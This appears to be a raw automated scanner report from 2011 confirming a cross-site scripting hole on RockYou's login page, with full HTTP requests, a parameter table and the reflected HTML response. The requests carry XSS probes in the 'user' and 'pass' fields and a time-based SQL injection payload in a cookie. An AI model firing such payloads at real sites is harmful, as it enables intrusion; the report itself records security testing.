Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91131 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9107
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\"><script>netsparker(9)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911<..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| pass | POST | 3 |
| user | POST | --><script>alert(9)</script> |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?lang=en&birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=o2thibc9jh08ib8t9kegn73vs4; lang=en; lastlogin=1303165886; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user=--%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=o2thibc9jh08ib8t9kegn73vs4; lang=en; lastlogin=1303165886; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user=--%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:31:26 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:31:25 GMT; path=/; domain=.rockyou.com,lastlogin=1303165886; expires=Wed, 27-Jul-2011 22:31:26 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:31:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=85314 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9126
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="--><script>netsparker(9)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="--><script>netsparker(9)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><..
Date: Mon, 18 Apr 2011 22:31:26 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:31:25 GMT; path=/; domain=.rockyou.com,lastlogin=1303165886; expires=Wed, 27-Jul-2011 22:31:26 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:31:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=85314 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9126
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
